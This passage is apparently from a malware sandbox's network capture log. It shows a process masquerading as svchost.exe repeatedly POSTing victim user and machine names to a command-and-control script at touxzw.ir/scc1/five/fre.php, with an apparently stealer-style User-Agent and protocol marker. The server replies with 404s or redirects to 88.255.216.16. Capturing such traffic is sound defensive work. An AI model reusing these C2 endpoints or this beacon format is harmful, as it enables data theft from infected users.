Feb 25, 2025 15:37:15.203108072 CET	816	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:15 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMvxrb2GXm52XjUoBgRJ6vRU34KbPSNXyKSzcLQJX2s3Kdr7yHCQmE6UdPxftFQZcah0Xp5PVqvI3PcWbSjv5pMOclKYaEALUdPa%2B9Ma8mWnhQQvF8RLerahcro%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ea7dc728cca-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49711	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:16.356118917 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:16.361092091 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:17.303005934 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p46K3cRosd1zUvZc5vWbwHXJVnTpvJWmgiPAjw433IB3fWXI02z37c9spr5RntLUmCLRyODBznnDKTdrZYfWA41S7FGNgRjhok6%2BI3LzEh25RvWd4dEbUqLZotw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786eb4bb6b3300-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=41242&min_rtt=41242&rtt_var=20621&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49717	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:18.465030909 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:18.470113993 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:19.261419058 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:19 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mGsvcWC2aXxjHZ52d%2FdPUG%2BbLUA49agvxs5P7jPY3KlyIQymoRM%2Bf%2BtPfOBDgRuqXCQ8qz8GKkCfS8XjNPHESpT5LuefYgiMVL5l3da1mu5nN6s00ZPB6heav70%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ec14a7341b2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49725	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:20.444559097 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:20.449634075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:21.219005108 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:21 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vcgzxTqzpMYqjXX9haJxvqy7FUaBbrUvB7jzDwjRBoBL8vyUUy4vMtuHoO51vYJ95pQV0UYY%2FFU%2FZ%2F727BXs%2Bq9X68WC%2FG3Tbdn71QcbmiqGMUcWdG42IWeqdQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ecd4a18333c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49741	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:22.511281013 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:22.516316891 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:23.245028019 CET	818	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:23 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWn224M8qaODcDMR9KyK1K8LXt4XPKumgW8N%2FiwGlFWZnPPyO10RxlIuIP2kx4TqATddmNr791wYl4qD%2FfrjpLQtlGM6aGM4YwwFiK8b6aYEZz9LL7hVm7CRHqI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786eda3a761902-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49752	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:24.437877893 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:24.442831993 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:25.199510098 CET	844	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quElBF7cCcOl%2F%2BwYN8JpnDd%2F0bR06osETrOKfplk8GDI%2FjXho8epVR7ywj4AL3g7onaYLpIivnjjWAqWZYrSzzjjuKKLSbFFbW2TkBXO5baIhzZc7EvuhqxGPTY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ee63c6befa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1960&min_rtt=1960&rtt_var=980&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49764	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:26.357697010 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:26.362703085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:27.144653082 CET	842	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXAnDOHqtZLg8KQef1f3x15VP4GN9dRgbPYkdAKfYZAY%2FtSUWoHP37nzK2RlZzTw8ax8U1qhTuHR%2B0YuFiAqlzo34Nzb2fiBM9tkfwufw6pTeQArDRmoKysVF84%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786ef24d3f183d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1663&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49779	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:28.319997072 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:28.324980021 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:29.115999937 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EcNCLvRAO8PnIXKu%2FxifYEj6KD1Nxx1K26MPqWNZlWz5FQAeFhZgSu9%2FvpL3SZ7q2N4Ai3kUuV%2FTj3pD25lhFh7E%2FTvhYEIt6COnLDVE5G0%2BsaSFgcjBZr1CpMI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786efe89b00f81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1776&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49792	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:30.277637959 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:30.282635927 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:31.069602013 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:30 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VpmlgfLq8Hs1CFiYEETV91rZ6iCE1AagXHJP%2BieKh9%2FjjYlmfqrPHnMq6Fr4rgTDh9KGmM77xJC0pFA3Vh6Oq57YRX05pZMEPf%2Bn7i8C5iVZ9Hv4WMYLS3nLs7E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f0acd451921-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1852&rtt_var=926&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49804	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:32.249792099 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:32.262944937 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:32.994560003 CET	831	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:32 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlUF3qMxttx3k7yb8S2E3cLIho642txMUD%2BYhFxrWmFBWx3dtyjLH61%2Br4RZe0VAPWtyT%2FG7prI4WMJCK%2FgdRTwOQyPihoeC%2B%2FsOlLEvI2RV%2BMrHD7EDKiYe%2FjE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f17195e1a1f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2057&min_rtt=2057&rtt_var=1028&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49819	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:34.165096045 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:34.171066046 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:34.936084986 CET	820	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:34 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3lqmCpoTrQC5C6QZkGL%2BxREm3e5bvkjD2M1oUV5W9ZDc2jtwzFWEfkWG8e55VoxcD5%2Bgyn0siK90s4krngFgW25XWrhzx5SmD2TC4IJoWaFfyQiXkzw%2B9uoWF4w%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f230b3b7c69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49832	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:36.091454983 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:36.096465111 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:36.860110044 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FcoGXowwhxxmtL1NO6iKhVj%2FsBLqQjwfPS%2Bgn1Df%2FxpliGeTpzI7yNKPS4015OqOzOn29T9lioZTx%2BIoq93Ei1c78T38Tzgv3KgxrO68bWvmM81Q1kT7WnLKOE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f2f2e9bf791-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49846	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:38.012402058 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:38.017544985 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:38.830161095 CET	846	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:37:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eTXzS%2Fr1IroS0v6Em%2Fs72VmpXXw8KI3jKlFa15pFp8pAR7tghVEtejgUiT385KW8HOv2q%2F1Cj4bASt%2FNRV61aJ7i4rP6Dg567c%2F3WpTcbx5Z6BHAl6Lz6pOze2Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f3b4c4f427f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49860	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:39.989026070 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:37:39.994211912 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:37:40.743145943 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:37:40 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ckY8Prk8Qk1O4SXrUvhy48KDz%2FacieCgPF2wIQeV2GXqnh87N11bSd3mhqRkaKexNFAMmmYyjrfWsMV8ONo8EKksf4jljervd4HY83yD8g9yzo3yVZcvmH3%2B1k%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91786f479a6c19cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21406&min_rtt=21406&rtt_var=10703&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49873	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:37:41.894064903 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
